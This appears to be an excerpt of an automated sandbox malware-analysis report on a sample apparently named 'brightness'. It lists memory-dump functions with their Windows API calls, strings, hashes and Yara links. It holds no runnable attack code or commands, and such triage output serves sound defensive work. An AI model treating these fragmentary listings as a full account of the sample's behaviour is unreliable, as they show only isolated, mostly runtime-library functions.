Opcode ID: d929f2f10d186b4487190613e83b4c2948855f43d8c1f98f75085fce5244aefd
Instruction ID: 4b06781887746c7e74fec4dd95742b91795d653ae6fb794b296d1b0450ca5f3c
Opcode Fuzzy Hash: d929f2f10d186b4487190613e83b4c2948855f43d8c1f98f75085fce5244aefd
Instruction Fuzzy Hash: 82F037F0B823015BDB05DFB99D443026BE2E789354F50C579D609EB288E77184028B11

Function 02781682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02782000), ref: 027816A4

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 345a6fb9636173ea1468539bcd6707877c2af85374c4185f2302acf2561080d7
Instruction ID: 0fb391a216d5f69d754c1eb9db16fc94a36f45c705e74522d456650d8c76c875
Opcode Fuzzy Hash: 345a6fb9636173ea1468539bcd6707877c2af85374c4185f2302acf2561080d7
Instruction Fuzzy Hash: DBF0BEF2B817967BD711AF5A9C94B82BBB4FB14324F454139FA4CDB340D770A8118B94

Function 027816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02781FE4), ref: 02781704

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 97edc877d93fe4a50ac0919c5f664ad7fed3015e98c8faa824da156db0a6be21
Instruction ID: 1e9347de125a74a59b79fc0d3e8f718c6f94d1b66e935c0355b973b24d1bf908
Opcode Fuzzy Hash: 97edc877d93fe4a50ac0919c5f664ad7fed3015e98c8faa824da156db0a6be21
Instruction Fuzzy Hash: 27E0CD75340302AFD7106B7D5D447537BDCEF48664F554479F549DB241D670E8118B60

Non-executed Functions

Function 0279A9D4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0279AC5B,?,?,0279ACED,00000000,0279ADC9), ref: 0279A9E8
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0279AA00
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0279AA12
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0279AA24
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0279AA36
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0279AA48
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0279AA5A
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0279AA6C
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0279AA7E
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0279AA90
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0279AAA2
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0279AAB4
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0279AAC6
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0279AAD8
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0279AAEA
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0279AAFC
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0279AB0E

Strings

Thread32First, xrefs: 0279AAAC
CreateToolhelp32Snapshot, xrefs: 0279A9F8
Module32First, xrefs: 0279AAD0
Module32FirstW, xrefs: 0279AAF4
Process32NextW, xrefs: 0279AA9A
Heap32ListFirst, xrefs: 0279AA0A
Toolhelp32ReadProcessMemory, xrefs: 0279AA52
kernel32.dll, xrefs: 0279A9E3
Heap32First, xrefs: 0279AA2E
Heap32ListNext, xrefs: 0279AA1C
Process32First, xrefs: 0279AA64
Heap32Next, xrefs: 0279AA40
Module32NextW, xrefs: 0279AB06
Thread32Next, xrefs: 0279AABE
Process32FirstW, xrefs: 0279AA88
Process32Next, xrefs: 0279AA76
Module32Next, xrefs: 0279AAE2

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 6c603d6c3a183239d732eaad3a5308cdbb07698014e3bac94d9763e798eff518
Instruction ID: 83c51f00b50901deeb37a816d11b5b682b660f8e7a656757f2454d001c8f4ae2
Opcode Fuzzy Hash: 6c603d6c3a183239d732eaad3a5308cdbb07698014e3bac94d9763e798eff518
Instruction Fuzzy Hash: E7310DF0AD37A0AFEF11EFB4E889A2537BAEB15704B115DA5A802CF204F6749850CF55

Function 02785908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,0278737C,02780000,027AE790), ref: 02785925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 0278593C
lstrcpynA.KERNEL32(?,?,?), ref: 0278596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,0278737C,02780000,027AE790), ref: 027859D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,0278737C,02780000,027AE790), ref: 02785A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,0278737C,02780000,027AE790), ref: 02785A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,0278737C,02780000,027AE790), ref: 02785A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0278737C,02780000,027AE790), ref: 02785A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0278737C,02780000), ref: 02785A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0278737C), ref: 02785A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02785A99

Strings

\, xrefs: 02785A49
kernel32.dll, xrefs: 02785920
GetLongPathNameA, xrefs: 02785933

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 929d05b7fcc1bbfe61bf9e9d717db43082ab269da91a7d49be2971b24053a0a5
Instruction ID: f6856388f973013e4813517bf89e555e8190c128a52131858d8ff55dee867e24
Opcode Fuzzy Hash: 929d05b7fcc1bbfe61bf9e9d717db43082ab269da91a7d49be2971b24053a0a5
Instruction Fuzzy Hash: 7F418171E80219AFDB11FEE8CCC8AEEB7BDAF08350F8545A5A158E7241E730DA448F55

Function 02785BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02785BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02785BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02785BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02785C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02785C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02785C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02785CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02785CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02785CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02785CEB

Strings

Software\Borland\Locales, xrefs: 02785AFC, 02785B1A
Software\Borland\Delphi\Locales, xrefs: 02785B38

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: d5c07614e662f3285a2dab4d3c8ef31ff15a0f65b153c41fcb050f0b0cc9fe60
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: DD31A771E8026D2AEF26E6B49C49FDF77AD9B04380F8501A19708E6181D7749E858F51

Function 02787FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02787FF5

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction ID: 28788be1a6533c959e6064a04f226b0229ad3e32c77c035cb78c8a2c2025996f
Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
Instruction Fuzzy Hash: 341100B5A00209AFDB04DF99C881DBFF7F9FFC8300B54C569A405E7250E6719A018B90

Function 0278A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0278A7E2

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 3fdfa48008ae648289bce87d3cb7309c76006280c5ba62656c349d790a46e458
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 3CE0D87174022517D312B5589C95EFA729D9758310F00427BBD05C7385FDF09E804AE4

Function 0278B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,027AD106,00000000,027AD11E), ref: 0278B79A

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 14333a3cce80dea5c00c1d418694ada4011be944847e075493576161b4378bb6
Instruction ID: 6d3b5c822c1a3875e73efb3579f8c40617d54567953ad04c1c8750293d684185
Opcode Fuzzy Hash: 14333a3cce80dea5c00c1d418694ada4011be944847e075493576161b4378bb6
Instruction Fuzzy Hash: 5CF09D74A843039FD350EF28D451A2677E9FBC8A24F408939EA98C7380E73498948B52

Function 0278A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0278BE72,00000000,0278C08B,?,?,00000000,00000000), ref: 0278A823

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: 620d86ccd1e8fc24aec6c23718beb02038f5c909f26bfac3056e1fa046ff15dd
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 88D05EA274E2A03AA311A15A2D85E7B5AECCBC57A1F00403AB988C7101D2008C07DAB1

Function 0278920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02789210

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 399875eda22d31651eb829a06abf570c6bc930239ec5bf216c5483a8f059d1da
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: CAA0124044486051854033180C0253430545C10A20FC4874068F8402D0EA1D01208093

Function 027820C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 0278D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0278D29D

Part of subcall function 0278D268: GetProcAddress.KERNEL32(00000000), ref: 0278D281

Strings

VarMul, xrefs: 0278D319
VarR4FromStr, xrefs: 0278D3DF
VarAdd, xrefs: 0278D2ED
VarR8FromStr, xrefs: 0278D3F5
VarBstrFromBool, xrefs: 0278D479
VarSub, xrefs: 0278D303
VarXor, xrefs: 0278D39D
VarBstrFromDate, xrefs: 0278D463
VarDiv, xrefs: 0278D32F
VarNot, xrefs: 0278D2D7
VarIdiv, xrefs: 0278D345
VarBoolFromStr, xrefs: 0278D437
VarCmp, xrefs: 0278D3B3
VarCyFromStr, xrefs: 0278D421
VarNeg, xrefs: 0278D2C1
VarBstrFromCy, xrefs: 0278D44D
VariantChangeTypeEx, xrefs: 0278D2AB
oleaut32.dll, xrefs: 0278D298
VarAnd, xrefs: 0278D371
VarOr, xrefs: 0278D387
VarI4FromStr, xrefs: 0278D3C9
VarDateFromStr, xrefs: 0278D40B
VarMod, xrefs: 0278D35B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 23a47a980a5ef8b76eed3d27adbd5a4c072d24aa2cc5217f0490cdf80985ed76
Instruction ID: ff812939f22199d67fc7b112e9d835952eb55266396572b68c62621a56a73f1c
Opcode Fuzzy Hash: 23a47a980a5ef8b76eed3d27adbd5a4c072d24aa2cc5217f0490cdf80985ed76
Instruction Fuzzy Hash: 1E4131729C93085A922976BD744452B77EAD744B243A3952FF404CB7D4ED30FC518B2A

Function 02796ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02796EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02796EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02796EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02796F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02796F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02796F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02796F3F

Strings

CoCreateInstanceEx, xrefs: 02796EE9
CoReleaseServerProcess, xrefs: 02796F19
CoAddRefServerProcess, xrefs: 02796F09
CoSuspendClassObjects, xrefs: 02796F39
ole32.dll, xrefs: 02796ED9
CoResumeClassObjects, xrefs: 02796F29
CoInitializeEx, xrefs: 02796EF9

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 354763037064e035f7ca3bc81037aeac0feeef8694e8e199927d82cc4ed6458a
Instruction ID: 29928e33082a52b49495983e485f1e47547dbdbaa9398d8df7be837a16a95fab
Opcode Fuzzy Hash: 354763037064e035f7ca3bc81037aeac0feeef8694e8e199927d82cc4ed6458a
Instruction Fuzzy Hash: 3CF045F0BD83C07EBF01BB706C89E362F5EA9616143005EA5B94356542FAB598148F54

Function 02782530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027828CE

Strings

bytes: , xrefs: 0278275D
The unexpected small block leaks are:, xrefs: 02782707
7, xrefs: 027826A1
String, xrefs: 027827A1
An unexpected memory leak has occurred. , xrefs: 02782690
Unexpected Memory Leak, xrefs: 027828C0
, xrefs: 02782814
Unknown, xrefs: 0278278C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02782849

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 4c8197c9c4b0e429ff6711e9e213b9babcb91c7eafbf9590bb5a28e2407f322c
Instruction ID: e7a19fadb5456181a9d87fb90ef7cdcb0a900b96355625a1725d053f51f8911a
Opcode Fuzzy Hash: 4c8197c9c4b0e429ff6711e9e213b9babcb91c7eafbf9590bb5a28e2407f322c
Instruction Fuzzy Hash: D3A1F330F842E48BDF22BA2CCC88B99B6E5EB09751F1440F5DD49AB287CB758985CF51

Function 0278252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

bytes: , xrefs: 0278275D
The unexpected small block leaks are:, xrefs: 02782707
7, xrefs: 027826A1
An unexpected memory leak has occurred. , xrefs: 02782690
Unexpected Memory Leak, xrefs: 027828C0
, xrefs: 02782814
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02782849

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

